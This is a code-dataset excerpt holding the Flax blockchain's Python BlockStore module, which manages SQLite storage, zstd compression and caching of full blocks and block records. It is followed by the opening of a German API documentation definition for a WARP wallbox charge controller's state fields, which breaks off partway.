{"seq_id":"19599865232","text":"from __future__ import annotations\n\nimport dataclasses\nimport logging\nimport sqlite3\nfrom typing import Dict, List, Optional, Tuple, Any, Union, Sequence\n\nimport typing_extensions\nimport zstd\n\nfrom flax.consensus.block_record import
BlockRecord\nfrom flax.types.blockchain_format.program import SerializedProgram\nfrom flax.types.blockchain_format.sized_bytes import bytes32\nfrom flax.types.full_block import FullBlock\nfrom flax.types.weight_proof import SubEpochChallengeSegment, SubEpochSegments\nfrom flax.util.db_wrapper import DBWrapper2, execute_fetchone\nfrom flax.util.errors import Err\nfrom flax.util.full_block_utils import block_info_from_block, generator_from_block\nfrom flax.util.ints import uint32\nfrom flax.util.lru_cache import LRUCache\nfrom flax.util.full_block_utils import GeneratorBlockInfo\n\nlog = logging.getLogger(__name__)\n\n\n@typing_extensions.final\n@dataclasses.dataclass\nclass BlockStore:\n block_cache: LRUCache[bytes32, FullBlock]\n db_wrapper: DBWrapper2\n ses_challenge_cache: LRUCache[bytes32, List[SubEpochChallengeSegment]]\n\n @classmethod\n async def create(cls, db_wrapper: DBWrapper2) -> BlockStore:\n self = cls(LRUCache(1000), db_wrapper, LRUCache(50))\n\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n\n log.info(\"DB: Creating block store tables and indexes.\")\n if self.db_wrapper.db_version == 2:\n\n # TODO: most data in block is duplicated in block_record. The only\n # reason for this is that our parsing of a FullBlock is so slow,\n # it's faster to store duplicate data to parse less when we just\n # need the BlockRecord. Once we fix the parsing (and data structure)\n # of FullBlock, this can use less space\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS full_blocks(\"\n \"header_hash blob PRIMARY KEY,\"\n \"prev_hash blob,\"\n \"height bigint,\"\n \"sub_epoch_summary blob,\"\n \"is_fully_compactified tinyint,\"\n \"in_main_chain tinyint,\"\n \"block blob,\"\n \"block_record blob)\"\n )\n\n # This is a single-row table containing the hash of the current\n # peak. 
The \"key\" field is there to make update statements simple\n await conn.execute(\"CREATE TABLE IF NOT EXISTS current_peak(key int PRIMARY KEY, hash blob)\")\n\n # If any of these indices are altered, they should also be altered\n # in the flax/cmds/db_upgrade.py file\n log.info(\"DB: Creating index height\")\n await conn.execute(\"CREATE INDEX IF NOT EXISTS height on full_blocks(height)\")\n\n # Sub epoch segments for weight proofs\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS sub_epoch_segments_v3(\"\n \"ses_block_hash blob PRIMARY KEY,\"\n \"challenge_segments blob)\"\n )\n\n # If any of these indices are altered, they should also be altered\n # in the flax/cmds/db_upgrade.py file\n log.info(\"DB: Creating index is_fully_compactified\")\n await conn.execute(\n \"CREATE INDEX IF NOT EXISTS is_fully_compactified ON\"\n \" full_blocks(is_fully_compactified, in_main_chain) WHERE in_main_chain=1\"\n )\n log.info(\"DB: Creating index main_chain\")\n await conn.execute(\n \"CREATE INDEX IF NOT EXISTS main_chain ON full_blocks(height, in_main_chain) WHERE in_main_chain=1\"\n )\n\n else:\n\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS full_blocks(header_hash text PRIMARY KEY, height bigint,\"\n \" is_block tinyint, is_fully_compactified tinyint, block blob)\"\n )\n\n # Block records\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS block_records(header_hash \"\n \"text PRIMARY KEY, prev_hash text, height bigint,\"\n \"block blob, sub_epoch_summary blob, is_peak tinyint, is_block tinyint)\"\n )\n\n # Sub epoch segments for weight proofs\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS sub_epoch_segments_v3(ses_block_hash text PRIMARY KEY,\"\n \"challenge_segments blob)\"\n )\n\n # Height index so we can look up in order of height for sync purposes\n log.info(\"DB: Creating index full_block_height\")\n await conn.execute(\"CREATE INDEX IF NOT EXISTS full_block_height on full_blocks(height)\")\n log.info(\"DB: Creating index is_fully_compactified\")\n await conn.execute(\n \"CREATE INDEX IF NOT EXISTS is_fully_compactified on full_blocks(is_fully_compactified)\"\n )\n\n log.info(\"DB: Creating index height\")\n await conn.execute(\"CREATE INDEX IF NOT EXISTS height on block_records(height)\")\n\n log.info(\"DB: Creating index peak\")\n await conn.execute(\"CREATE INDEX IF NOT EXISTS peak on block_records(is_peak)\")\n\n return self\n\n def maybe_from_hex(self, field: Union[bytes, str]) -> bytes32:\n if self.db_wrapper.db_version == 2:\n assert isinstance(field, bytes)\n return bytes32(field)\n else:\n assert isinstance(field, str)\n return bytes32.fromhex(field)\n\n def maybe_to_hex(self, field: bytes) -> Any:\n if self.db_wrapper.db_version == 2:\n return field\n else:\n return field.hex()\n\n def compress(self, block: FullBlock) -> bytes:\n ret: bytes = zstd.compress(bytes(block))\n return ret\n\n def maybe_decompress(self, block_bytes: bytes) -> FullBlock:\n if self.db_wrapper.db_version == 2:\n ret: FullBlock = FullBlock.from_bytes(zstd.decompress(block_bytes))\n else:\n ret = FullBlock.from_bytes(block_bytes)\n return ret\n\n def maybe_decompress_blob(self, block_bytes: bytes) -> bytes:\n if self.db_wrapper.db_version == 2:\n ret: bytes = zstd.decompress(block_bytes)\n return ret\n else:\n return block_bytes\n\n async def rollback(self, height: int) -> None:\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"UPDATE OR FAIL full_blocks SET in_main_chain=0 WHERE height>? 
AND in_main_chain=1\", (height,)\n )\n\n async def set_in_chain(self, header_hashes: List[Tuple[bytes32]]) -> None:\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.executemany(\n \"UPDATE OR FAIL full_blocks SET in_main_chain=1 WHERE header_hash=?\", header_hashes\n )\n\n async def replace_proof(self, header_hash: bytes32, block: FullBlock) -> None:\n\n assert header_hash == block.header_hash\n\n block_bytes: bytes\n if self.db_wrapper.db_version == 2:\n block_bytes = self.compress(block)\n else:\n block_bytes = bytes(block)\n\n self.block_cache.put(header_hash, block)\n\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"UPDATE full_blocks SET block=?,is_fully_compactified=? WHERE header_hash=?\",\n (\n block_bytes,\n int(block.is_fully_compactified()),\n self.maybe_to_hex(header_hash),\n ),\n )\n\n async def add_full_block(self, header_hash: bytes32, block: FullBlock, block_record: BlockRecord) -> None:\n self.block_cache.put(header_hash, block)\n\n if self.db_wrapper.db_version == 2:\n\n ses: Optional[bytes] = (\n None\n if block_record.sub_epoch_summary_included is None\n else bytes(block_record.sub_epoch_summary_included)\n )\n\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"INSERT OR IGNORE INTO full_blocks VALUES(?, ?, ?, ?, ?, ?, ?, ?)\",\n (\n header_hash,\n block.prev_header_hash,\n block.height,\n ses,\n int(block.is_fully_compactified()),\n False, # in_main_chain\n self.compress(block),\n bytes(block_record),\n ),\n )\n\n else:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"INSERT OR IGNORE INTO full_blocks VALUES(?, ?, ?, ?, ?)\",\n (\n header_hash.hex(),\n block.height,\n int(block.is_transaction_block()),\n int(block.is_fully_compactified()),\n bytes(block),\n ),\n )\n\n await conn.execute(\n \"INSERT OR IGNORE INTO block_records VALUES(?, ?, ?, ?,?, ?, ?)\",\n (\n header_hash.hex(),\n block.prev_header_hash.hex(),\n block.height,\n bytes(block_record),\n None\n if block_record.sub_epoch_summary_included is None\n else bytes(block_record.sub_epoch_summary_included),\n False,\n block.is_transaction_block(),\n ),\n )\n\n async def persist_sub_epoch_challenge_segments(\n self, ses_block_hash: bytes32, segments: List[SubEpochChallengeSegment]\n ) -> None:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\n \"INSERT OR REPLACE INTO sub_epoch_segments_v3 VALUES(?, ?)\",\n (self.maybe_to_hex(ses_block_hash), bytes(SubEpochSegments(segments))),\n )\n\n async def get_sub_epoch_challenge_segments(\n self,\n ses_block_hash: bytes32,\n ) -> Optional[List[SubEpochChallengeSegment]]:\n cached: Optional[List[SubEpochChallengeSegment]] = self.ses_challenge_cache.get(ses_block_hash)\n if cached is not None:\n return cached\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT challenge_segments from sub_epoch_segments_v3 WHERE ses_block_hash=?\",\n (self.maybe_to_hex(ses_block_hash),),\n ) as cursor:\n row = await cursor.fetchone()\n\n if row is not None:\n challenge_segments: List[SubEpochChallengeSegment] = SubEpochSegments.from_bytes(row[0]).challenge_segments\n self.ses_challenge_cache.put(ses_block_hash, challenge_segments)\n return challenge_segments\n return None\n\n def rollback_cache_block(self, header_hash: bytes32) -> None:\n try:\n self.block_cache.remove(header_hash)\n except KeyError:\n # this is best 
effort. When rolling back, we may not have added the\n # block to the cache yet\n pass\n\n async def get_full_block(self, header_hash: bytes32) -> Optional[FullBlock]:\n cached: Optional[FullBlock] = self.block_cache.get(header_hash)\n if cached is not None:\n log.debug(f\"cache hit for block {header_hash.hex()}\")\n return cached\n log.debug(f\"cache miss for block {header_hash.hex()}\")\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block from full_blocks WHERE header_hash=?\", (self.maybe_to_hex(header_hash),)\n ) as cursor:\n row = await cursor.fetchone()\n if row is not None:\n block = self.maybe_decompress(row[0])\n self.block_cache.put(header_hash, block)\n return block\n return None\n\n async def get_full_block_bytes(self, header_hash: bytes32) -> Optional[bytes]:\n cached = self.block_cache.get(header_hash)\n if cached is not None:\n log.debug(f\"cache hit for block {header_hash.hex()}\")\n return bytes(cached)\n log.debug(f\"cache miss for block {header_hash.hex()}\")\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block from full_blocks WHERE header_hash=?\", (self.maybe_to_hex(header_hash),)\n ) as cursor:\n row = await cursor.fetchone()\n if row is not None:\n if self.db_wrapper.db_version == 2:\n ret: bytes = zstd.decompress(row[0])\n else:\n ret = row[0]\n return ret\n\n return None\n\n async def get_full_blocks_at(self, heights: List[uint32]) -> List[FullBlock]:\n if len(heights) == 0:\n return []\n\n formatted_str = f'SELECT block from full_blocks WHERE height in ({\"?,\" * (len(heights) - 1)}?)'\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, heights) as cursor:\n ret: List[FullBlock] = []\n for row in await cursor.fetchall():\n ret.append(self.maybe_decompress(row[0]))\n return ret\n\n async def get_block_info(self, header_hash: bytes32) -> Optional[GeneratorBlockInfo]:\n\n cached = self.block_cache.get(header_hash)\n if cached is not None:\n log.debug(f\"cache hit for block {header_hash.hex()}\")\n return GeneratorBlockInfo(\n cached.foliage.prev_block_hash, cached.transactions_generator, cached.transactions_generator_ref_list\n )\n\n formatted_str = \"SELECT block, height from full_blocks WHERE header_hash=?\"\n async with self.db_wrapper.reader_no_transaction() as conn:\n row = await execute_fetchone(conn, formatted_str, (self.maybe_to_hex(header_hash),))\n if row is None:\n return None\n if self.db_wrapper.db_version == 2:\n block_bytes = zstd.decompress(row[0])\n else:\n block_bytes = row[0]\n\n try:\n return block_info_from_block(block_bytes)\n except Exception as e:\n log.exception(f\"cheap parser failed for block at height {row[1]}: {e}\")\n # this is defensive, on the off-chance that\n # block_info_from_block() fails, fall back to the reliable\n # definition of parsing a block\n b = FullBlock.from_bytes(block_bytes)\n return GeneratorBlockInfo(\n b.foliage.prev_block_hash, b.transactions_generator, b.transactions_generator_ref_list\n )\n\n async def get_generator(self, header_hash: bytes32) -> Optional[SerializedProgram]:\n\n cached = self.block_cache.get(header_hash)\n if cached is not None:\n log.debug(f\"cache hit for block {header_hash.hex()}\")\n return cached.transactions_generator\n\n formatted_str = \"SELECT block, height from full_blocks WHERE header_hash=?\"\n async with self.db_wrapper.reader_no_transaction() as conn:\n row = await execute_fetchone(conn, formatted_str, 
(self.maybe_to_hex(header_hash),))\n if row is None:\n return None\n if self.db_wrapper.db_version == 2:\n block_bytes = zstd.decompress(row[0])\n else:\n block_bytes = row[0]\n\n try:\n return generator_from_block(block_bytes)\n except Exception as e:\n log.error(f\"cheap parser failed for block at height {row[1]}: {e}\")\n # this is defensive, on the off-chance that\n # generator_from_block() fails, fall back to the reliable\n # definition of parsing a block\n b = FullBlock.from_bytes(block_bytes)\n return b.transactions_generator\n\n async def get_generators_at(self, heights: List[uint32]) -> List[SerializedProgram]:\n assert self.db_wrapper.db_version == 2\n\n if len(heights) == 0:\n return []\n\n generators: Dict[uint32, SerializedProgram] = {}\n formatted_str = (\n f\"SELECT block, height from full_blocks \"\n f'WHERE in_main_chain=1 AND height in ({\"?,\" * (len(heights) - 1)}?)'\n )\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, heights) as cursor:\n async for row in cursor:\n block_bytes = zstd.decompress(row[0])\n\n try:\n gen = generator_from_block(block_bytes)\n except Exception as e:\n log.error(f\"cheap parser failed for block at height {row[1]}: {e}\")\n # this is defensive, on the off-chance that\n # generator_from_block() fails, fall back to the reliable\n # definition of parsing a block\n b = FullBlock.from_bytes(block_bytes)\n gen = b.transactions_generator\n if gen is None:\n raise ValueError(Err.GENERATOR_REF_HAS_NO_GENERATOR)\n generators[uint32(row[1])] = gen\n\n return [generators[h] for h in heights]\n\n async def get_block_records_by_hash(self, header_hashes: List[bytes32]) -> List[BlockRecord]:\n \"\"\"\n Returns a list of Block Records, ordered by the same order in which header_hashes are passed in.\n Throws an exception if the blocks are not present\n \"\"\"\n if len(header_hashes) == 0:\n return []\n\n all_blocks: Dict[bytes32, BlockRecord] = {}\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT header_hash,block_record FROM full_blocks \"\n f'WHERE header_hash in ({\"?,\" * (len(header_hashes) - 1)}?)',\n header_hashes,\n ) as cursor:\n for row in await cursor.fetchall():\n header_hash = bytes32(row[0])\n all_blocks[header_hash] = BlockRecord.from_bytes(row[1])\n else:\n formatted_str = f'SELECT block from block_records WHERE header_hash in ({\"?,\" * (len(header_hashes) - 1)}?)'\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, [hh.hex() for hh in header_hashes]) as cursor:\n for row in await cursor.fetchall():\n block_rec: BlockRecord = BlockRecord.from_bytes(row[0])\n all_blocks[block_rec.header_hash] = block_rec\n\n ret: List[BlockRecord] = []\n for hh in header_hashes:\n if hh not in all_blocks:\n raise ValueError(f\"Header hash {hh} not in the blockchain\")\n ret.append(all_blocks[hh])\n return ret\n\n async def get_block_bytes_by_hash(self, header_hashes: List[bytes32]) -> List[bytes]:\n \"\"\"\n Returns a list of Full Blocks block blobs, ordered by the same order in which header_hashes are passed in.\n Throws an exception if the blocks are not present\n \"\"\"\n\n if len(header_hashes) == 0:\n return []\n\n # sqlite on python3.7 on windows has issues with large variable substitutions\n assert len(header_hashes) < 901\n header_hashes_db: Sequence[Union[bytes32, str]]\n if self.db_wrapper.db_version == 2:\n header_hashes_db = header_hashes\n else:\n 
header_hashes_db = [hh.hex() for hh in header_hashes]\n formatted_str = (\n f'SELECT header_hash, block from full_blocks WHERE header_hash in ({\"?,\" * (len(header_hashes_db) - 1)}?)'\n )\n all_blocks: Dict[bytes32, bytes] = {}\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, header_hashes_db) as cursor:\n for row in await cursor.fetchall():\n header_hash = self.maybe_from_hex(row[0])\n all_blocks[header_hash] = self.maybe_decompress_blob(row[1])\n\n ret: List[bytes] = []\n for hh in header_hashes:\n block = all_blocks.get(hh)\n if block is not None:\n ret.append(block)\n else:\n raise ValueError(f\"Header hash {hh} not in the blockchain\")\n return ret\n\n async def get_blocks_by_hash(self, header_hashes: List[bytes32]) -> List[FullBlock]:\n \"\"\"\n Returns a list of Full Blocks blocks, ordered by the same order in which header_hashes are passed in.\n Throws an exception if the blocks are not present\n \"\"\"\n\n if len(header_hashes) == 0:\n return []\n\n header_hashes_db: Sequence[Union[bytes32, str]]\n if self.db_wrapper.db_version == 2:\n header_hashes_db = header_hashes\n else:\n header_hashes_db = [hh.hex() for hh in header_hashes]\n formatted_str = (\n f'SELECT header_hash, block from full_blocks WHERE header_hash in ({\"?,\" * (len(header_hashes_db) - 1)}?)'\n )\n all_blocks: Dict[bytes32, FullBlock] = {}\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str, header_hashes_db) as cursor:\n for row in await cursor.fetchall():\n header_hash = self.maybe_from_hex(row[0])\n full_block: FullBlock = self.maybe_decompress(row[1])\n all_blocks[header_hash] = full_block\n self.block_cache.put(header_hash, full_block)\n ret: List[FullBlock] = []\n for hh in header_hashes:\n if hh not in all_blocks:\n raise ValueError(f\"Header hash {hh} not in the blockchain\")\n ret.append(all_blocks[hh])\n return ret\n\n async def get_block_record(self, header_hash: bytes32) -> Optional[BlockRecord]:\n\n if self.db_wrapper.db_version == 2:\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block_record FROM full_blocks WHERE header_hash=?\",\n (header_hash,),\n ) as cursor:\n row = await cursor.fetchone()\n if row is not None:\n return BlockRecord.from_bytes(row[0])\n\n else:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block from block_records WHERE header_hash=?\",\n (header_hash.hex(),),\n ) as cursor:\n row = await cursor.fetchone()\n if row is not None:\n return BlockRecord.from_bytes(row[0])\n return None\n\n async def get_block_records_in_range(\n self,\n start: int,\n stop: int,\n ) -> Dict[bytes32, BlockRecord]:\n \"\"\"\n Returns a dictionary with all blocks in range between start and stop\n if present.\n \"\"\"\n\n ret: Dict[bytes32, BlockRecord] = {}\n if self.db_wrapper.db_version == 2:\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT header_hash, block_record FROM full_blocks WHERE height >= ? 
AND height <= ?\",\n (start, stop),\n ) as cursor:\n for row in await cursor.fetchall():\n header_hash = bytes32(row[0])\n ret[header_hash] = BlockRecord.from_bytes(row[1])\n\n else:\n\n formatted_str = f\"SELECT header_hash, block from block_records WHERE height >= {start} and height <= {stop}\"\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with await conn.execute(formatted_str) as cursor:\n for row in await cursor.fetchall():\n header_hash = self.maybe_from_hex(row[0])\n ret[header_hash] = BlockRecord.from_bytes(row[1])\n\n return ret\n\n async def get_block_bytes_in_range(\n self,\n start: int,\n stop: int,\n ) -> List[bytes]:\n \"\"\"\n Returns a list with all full blocks in range between start and stop\n if present.\n \"\"\"\n\n maybe_decompress_blob = self.maybe_decompress_blob\n assert self.db_wrapper.db_version == 2\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT block FROM full_blocks WHERE height >= ? AND height <= ? and in_main_chain=1\",\n (start, stop),\n ) as cursor:\n rows: List[sqlite3.Row] = list(await cursor.fetchall())\n if len(rows) != (stop - start) + 1:\n raise ValueError(f\"Some blocks in range {start}-{stop} were not found.\")\n return [maybe_decompress_blob(row[0]) for row in rows]\n\n async def get_peak(self) -> Optional[Tuple[bytes32, uint32]]:\n\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"SELECT hash FROM current_peak WHERE key = 0\") as cursor:\n peak_row = await cursor.fetchone()\n if peak_row is None:\n return None\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"SELECT height FROM full_blocks WHERE header_hash=?\", (peak_row[0],)) as cursor:\n peak_height = await cursor.fetchone()\n if peak_height is None:\n return None\n return bytes32(peak_row[0]), uint32(peak_height[0])\n else:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"SELECT header_hash, height from block_records WHERE is_peak = 1\") as cursor:\n peak_row = await cursor.fetchone()\n if peak_row is None:\n return None\n return bytes32(bytes.fromhex(peak_row[0])), uint32(peak_row[1])\n\n async def get_block_records_close_to_peak(\n self, blocks_n: int\n ) -> Tuple[Dict[bytes32, BlockRecord], Optional[bytes32]]:\n \"\"\"\n Returns a dictionary with all blocks that have height >= peak height - blocks_n, as well as the\n peak header hash.\n \"\"\"\n\n peak = await self.get_peak()\n if peak is None:\n return {}, None\n\n ret: Dict[bytes32, BlockRecord] = {}\n if self.db_wrapper.db_version == 2:\n\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"SELECT header_hash, block_record FROM full_blocks WHERE height >= ?\",\n (peak[1] - blocks_n,),\n ) as cursor:\n for row in await cursor.fetchall():\n header_hash = bytes32(row[0])\n ret[header_hash] = BlockRecord.from_bytes(row[1])\n\n else:\n formatted_str = f\"SELECT header_hash, block from block_records WHERE height >= {peak[1] - blocks_n}\"\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(formatted_str) as cursor:\n for row in await cursor.fetchall():\n header_hash = self.maybe_from_hex(row[0])\n ret[header_hash] = BlockRecord.from_bytes(row[1])\n\n return ret, peak[0]\n\n async def set_peak(self, header_hash: bytes32) -> None:\n # We need to be in a sqlite transaction here.\n # Note: we do not commit this to the database yet, as we need 
to also change the coin store\n\n if self.db_wrapper.db_version == 2:\n # Note: we use the key field as 0 just to ensure all inserts replace the existing row\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\"INSERT OR REPLACE INTO current_peak VALUES(?, ?)\", (0, header_hash))\n else:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n await conn.execute(\"UPDATE block_records SET is_peak=0 WHERE is_peak=1\")\n await conn.execute(\n \"UPDATE block_records SET is_peak=1 WHERE header_hash=?\",\n (self.maybe_to_hex(header_hash),),\n )\n\n async def is_fully_compactified(self, header_hash: bytes32) -> Optional[bool]:\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n async with conn.execute(\n \"SELECT is_fully_compactified from full_blocks WHERE header_hash=?\", (self.maybe_to_hex(header_hash),)\n ) as cursor:\n row = await cursor.fetchone()\n if row is None:\n return None\n return bool(row[0])\n\n async def get_random_not_compactified(self, number: int) -> List[int]:\n\n if self.db_wrapper.db_version == 2:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n f\"SELECT height FROM full_blocks WHERE in_main_chain=1 AND is_fully_compactified=0 \"\n f\"ORDER BY RANDOM() LIMIT {number}\"\n ) as cursor:\n rows = await cursor.fetchall()\n else:\n # Since orphan blocks do not get compactified, we need to check whether all blocks with a\n # certain height are not compact. And if we do have compact orphan blocks, then all that\n # happens is that the occasional chain block stays uncompact - not ideal, but harmless.\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n f\"SELECT height FROM full_blocks GROUP BY height HAVING sum(is_fully_compactified)=0 \"\n f\"ORDER BY RANDOM() LIMIT {number}\"\n ) as cursor:\n rows = await cursor.fetchall()\n\n heights = [int(row[0]) for row in rows]\n\n return heights\n\n async def count_compactified_blocks(self) -> int:\n if self.db_wrapper.db_version == 2:\n # DB V2 has an index on is_fully_compactified only for blocks in the main chain\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"select count(*) from full_blocks where is_fully_compactified=1 and in_main_chain=1\"\n ) as cursor:\n row = await cursor.fetchone()\n else:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"select count(*) from full_blocks where is_fully_compactified=1\") as cursor:\n row = await cursor.fetchone()\n\n assert row is not None\n\n [count] = row\n return int(count)\n\n async def count_uncompactified_blocks(self) -> int:\n if self.db_wrapper.db_version == 2:\n # DB V2 has an index on is_fully_compactified only for blocks in the main chain\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\n \"select count(*) from full_blocks where is_fully_compactified=0 and in_main_chain=1\"\n ) as cursor:\n row = await cursor.fetchone()\n else:\n async with self.db_wrapper.reader_no_transaction() as conn:\n async with conn.execute(\"select count(*) from full_blocks where is_fully_compactified=0\") as cursor:\n row = await cursor.fetchone()\n\n assert row is not None\n\n [count] = row\n return 
int(count)\n","repo_name":"Flax-Network/flax-blockchain","sub_path":"flax/full_node/block_store.py","file_name":"block_store.py","file_ext":"py","file_size_in_byte":32756,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"35"} +{"seq_id":"45195521896","text":"from api_doc_common import *\n\nevse = Module(\"evse\", \"Ladecontroller (EVSE)\", \"Benötigt das Feature \\\"evse\\\"\", Version.WARP1 | Version.WARP2,[\n Func(\"state\", FuncType.STATE, Elem.OBJECT(\"Der Zustand des Ladecontrollers.\", members={\n \"iec61851_state\": Elem.INT(\"Der aktuelle Zustand nach IEC 61851\", constants=[\n Const(0, \"A: Nicht verbunden\"),\n Const(1, \"B: Verbunden\"),\n Const(2, \"C: Lädt\"),\n Const(3, \"D: Lädt mit Belüftung (nicht unterstützt)\"),\n Const(4, \"E/F: Fehler\"),\n ]),\n \"charger_state\": Elem.INT(\"Der aktuelle Zustand, aufbereitet vom Ladecontroller\", constants=[\n Const(0, \"Nicht verbunden\"),\n Const(1, \"Warte auf Ladefreigabe\"),\n Const(2, \"Ladebereit\"),\n Const(3, \"Lädt\"),\n Const(4, \"Fehler\"),\n ]),\n \"contactor_state\": Elem.INT(\"Schützüberwachung. Überwacht wird die Spannung vor und nach dem Schütz\", constants=[\n Const(0, \"Nicht stromführend vor und nach dem Schütz\"),\n Const(1, \"Stromführend vor, aber nicht stromführend nach dem Schütz\"),\n Const(2, \"Nicht stromführend vor, aber stromführend nach dem Schütz\"),\n Const(3, \"Stromführend vor und nach dem Schütz\"),\n ]),\n \"contactor_error\": Elem.INT(\"Fehlercode der Schützüberwachung. Ein Wert ungleich 0 zeigt einen Fehler an.\", constants=[\n Const(0, \"Kein Fehler\"),\n Const(1, \"Schütz sollte durchschalten.
Kein Strom vor Schütz, kein Strom nach Schütz. Stromversorgung prüfen.\"),\n            Const(2, \"Schütz sollte durchschalten. Strom vor Schütz, kein Strom nach Schütz. Schütz defekt?\"),\n            Const(3, \"Schütz sollte durchschalten. Kein Strom vor Schütz, Strom nach Schütz. Verkabelung prüfen.\"),\n            Const(4, \"Schütz sollte nicht durchschalten. Kein Strom vor Schütz, kein Strom nach Schütz. Stromversorgung prüfen.\"),\n            Const(5, \"Schütz sollte nicht durchschalten. Kein Strom vor Schütz, Strom nach Schütz. Verkabelung prüfen.\"),\n            Const(6, \"Schütz sollte nicht durchschalten. Strom vor Schütz, Strom nach Schütz.
Schütz defekt?\"),\n ]),\n \"allowed_charging_current\": Elem.INT(\"Maximal erlaubter Ladestrom, der dem Fahrzeug zur Verfügung gestellt wird. Dieser Strom ist das Minimum der Stromgrenzen aller Ladeslots.\", unit=Units.mA),\n \"error_state\": Elem.INT('Der aktuelle Fehlerzustand. Siehe Handbuch für Details.', constants=[\n Const(0, \"OK\"),\n Const(2, \"Schalterfehler\"),\n Const(3, \"DC-Fehlerstromüberwachungsfehler\"),\n Const(4, \"Schützfehler\"),\n Const(5, \"Kommunikationsfehler\"),\n ]),\n \"lock_state\": Elem.INT(\"Zustand der Kabelverriegelung (nur relevant für Wallboxen mit Typ-2-Dose)\", constants=[\n Const(0, \"Initialisierung\"),\n Const(1, \"Offen\"),\n Const(2, \"Schließend\"),\n Const(3, \"Geschlossen\"),\n Const(4, \"Öffnend\"),\n Const(5, \"Fehler\"),\n ]),\n \"dc_fault_current_state\": Elem.INT(\"Der Zustand des DC-Fehlerstrom-Schutzmoduls. Falls ein Gleichstromfehler auftritt, kann nicht mehr geladen werden, bis das Schutzmodul zurückgesetzt wurde. Vor dem Zurücksetzen muss der Grund des Fehlers unbedingt behoben werden! {{{ref:evse/reset_dc_fault_current_state}}} setzt das Modul zurück.\", constants=[\n Const(0, \"Kein Fehler\"),\n Const(1, \"6 mA Fehlerstrom detektiert\"),\n Const(2, \"Systemfehler\"),\n Const(3, \"Unbekannter fehler\"),\n Const(4, \"Kalibrierungsfehler\"),\n ], version=Version.WARP2)\n })\n ),\n\n Func(\"hardware_configuration\", FuncType.STATE, Elem.OBJECT(\"Die Hardwarekonfiguration des Ladecontrollers.\", members={\n \"jumper_configuration\": Elem.INT(\"Der Maximalstrom des eingehenden Kabels. Dieser Strom wird auf dem Ladecontroller durch Jumper oder eine Steckplatine mit Schaltern konfiguriert.\", constants=[\n Const(0, \"6 Ampere\"),\n Const(1, \"10 Ampere\"),\n Const(2, \"13 Ampere\"),\n Const(3, \"16 Ampere\"),\n Const(4, \"20 Ampere\"),\n Const(5, \"25 Ampere\"),\n Const(6, \"32 Ampere\"),\n Const(7, \"Kontrolliert durch Software\"),\n Const(8, \"Nicht konfiguriert\"),\n ]),\n \"has_lock_switch\": Elem.BOOL(\"Gibt an, ob die Wallbox über eine Kabelverriegelung verfügt.\", constants=[\n Const(False, \"Wallbox hat fest angeschlagenes Typ-2-Ladekabel\"),\n Const(True, \"Wallbox hat eine Typ-2-Dose mit Kabelverriegelung\"),\n ]),\n \"evse_version\": Elem.INT(\"Hardware-Version des Ladecontrollers\", constants=[\n Const(14, \"EVSE 1.4\", Version.WARP1),\n Const(15, \"EVSE 1.5\", Version.WARP1),\n Const(20, \"EVSE 2.0\", Version.WARP2)\n ]),\n \"energy_meter_type\": Elem.INT(\"Typ des verbauten Stromzählers. Nicht jeder Stromzähler wird von jeder Wallbox unterstützt!\", constants=[\n Const(0, \"Kein Stromzähler verfügbar\"),\n Const(1, \"SDM72\", Version.WARP1),\n Const(2, \"SDM630\", Version.WARP2),\n Const(3, \"SDM72V2\", Version.WARP2)\n ], version=Version.WARP2)\n })\n ),\n\n Func(\"slots\", FuncType.STATE, Elem.ARRAY(\"Der Zustand der Ladeslots. Siehe TODO LINK für Details.\", members=[\n * 14 * [Elem.OBJECT(\"Ein Ladeslot\", members = {\n \"max_current\": Elem.INT(\"Maximal erlaubter Ladestrom. 
